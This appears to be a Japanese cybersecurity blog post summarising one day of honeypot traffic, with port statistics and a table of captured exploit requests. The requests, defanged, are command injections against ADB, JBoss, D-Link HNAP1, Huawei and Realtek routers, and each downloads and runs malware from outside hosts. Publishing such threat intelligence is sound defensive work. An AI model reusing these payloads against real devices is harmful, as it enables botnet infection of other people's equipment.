sec-chick Blog

サイバーセキュリティブログ

ハニーポット簡易分析(24日目:9/1)

本来であれば、8/30,8/31の分析を行うはずでしたが、こちらの手違いでデータをロストしてしまいましたorz

今回は9/1分の分析となります。

9/1 Honeytrap 3422件(データ部 0byte以上)

ポート 件数 割合 サービス
445 1,813 52.98% SMB
22 118 3.45% SSH
3389 84 2.46% RDP
1433 77 2.25% Microsoft SQL Server
502 61 1.78% Modbus Protocol 
52869 58 1.70% D-Link, Realtek SDK
8080 47 1.37% PROXY
5986 34 0.99% Windows PowerShell Default psSession Port 
81 32 0.94%

goahead

64738 32 0.94% Mumble VoIP server

 

マルウェアダウンロード関連

宛先ポート 対象 パス ペイロード
5555 Android Debug Bridge   CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN[.][.][.][.][.][.][.][.]Ý[.][.][.]&A[.][.]°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
VirusTotal
  CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN)[.][.][.][.][.][.][.][.][.][.][.]O/[.][.]°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
VirusTotal
8080 JBOSS GET /jbossass/jbossass.jsp GET /jbossass/jbossass[.]jsp?ppp=wget+hxxp%3A%2F%2F49[.]123[.]1[.]37%2Fctbuzs%2Fstdpic%2F2015%2F02%2Fdevice%2Fjboss%2Fplaintext[.]txt HTTP/1[.]1
User-Agent: jexboss
VirusTotal
D-Link DSL-2750B GET /login.cgi wget%20hxxp://148[.]72[.]176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
User-Agent: Hakai/2[.]0
VirusTotal
808 D-Link 社のルータ
(CVE-2015-2051) 
POST /HNAP1/  SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148[.]72[.]176[.]78/ngynx && sh ngynx`
VirusTotal
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mips && chmod 777 /tmp/kenjiro[.]mips/ && /tmp/kenjiro[.]mips`
VirusTotal
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://77[.]87[.]77[.]250/izuku[.]mips && chmod +x izuku[.]mips; [.]/izuku[.]mips`
VirusTotal
 
37215 Huawei社のルータ POST /ctrlt/DeviceUpgrade_1  <NewStatusURL>$(busybox wget -g 142[.]93[.]245[.]252 -l /tmp/aa1 -r /gaybub/miori[.]mips;busybox chmod +x /tmp/aa1 ;/tmp/aa1 huawei)</NewStatusURL>
VirusTotal
   
52869 Realtek SDK miniigd SOAP   POST /picdesc.xml <NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/rr`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /tmp/;wget hxxp://159[.]65[.]232[.]56/xd[.]mips`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/miori[.]mips`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /tmp/;wget hxxp://107[.]191[.]99[.]41/elf[.]mips -O elf`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /tmp/;wget hxxp://46[.]101[.]250[.]21/8mips8[.]mips -O 8mips8`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /tmp/; wget hxxp://76[.]74[.]170[.]223/shit[.]mips -O k`</NewInternalClient>
VirusTotal

 

大きな傾向の変化は特にありませんでした。
分析する上で、手動で行なっている部分が非常に多いため、自動化で分析に時間がかけられるようにしたいと思っています。また、IDSのsuricataも導入したものの、うまく使えていないのが現状となっています。
今月は自動化とIDSのチューニングに力を入れて、頑張っていきます。